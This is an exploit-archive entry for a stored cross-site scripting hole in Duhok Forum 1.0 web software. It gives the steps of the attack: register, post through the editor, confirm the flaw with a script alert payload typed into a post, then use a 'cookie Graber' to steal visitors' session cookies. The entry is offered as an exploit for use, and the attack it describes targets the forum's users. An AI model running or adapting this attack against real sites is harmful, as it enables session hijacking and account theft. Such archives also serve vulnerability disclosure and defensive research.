Duhok Forum 1.0 script Cross Site Scripting Vulnerability

2010-03-15T00:00:00
ID 1337DAY-ID-11293
Type zdt
Reporter indoushka
Modified 2010-03-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Duhok Forum 1.0 script Cross Site Scripting Vulnerability
=========================================================

========================================================================================
| # Title    : Duhok Forum 1.0 script Cross Site Scripting Vulnerability
| # Author   : indoushka
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug      : XSS
======================      Exploit By indoushka       =================================
 # Exploit  :
 
 1 - http://127.0.0.1/st/index.php?mode=register&Approval=1 (1 register in to the web site)
 
 2 - http://127.0.0.1/st/index.php?mode=editor&method=topic&f=1&c=1 (2 past a new post )
 
Put this code 4 virified is infected or not <ScRiPt>alert(213771818860)</ScRiPt> a test post
 
 3- if it infected post a new post and use cookie Graber



#  0day.today [2018-01-11]  #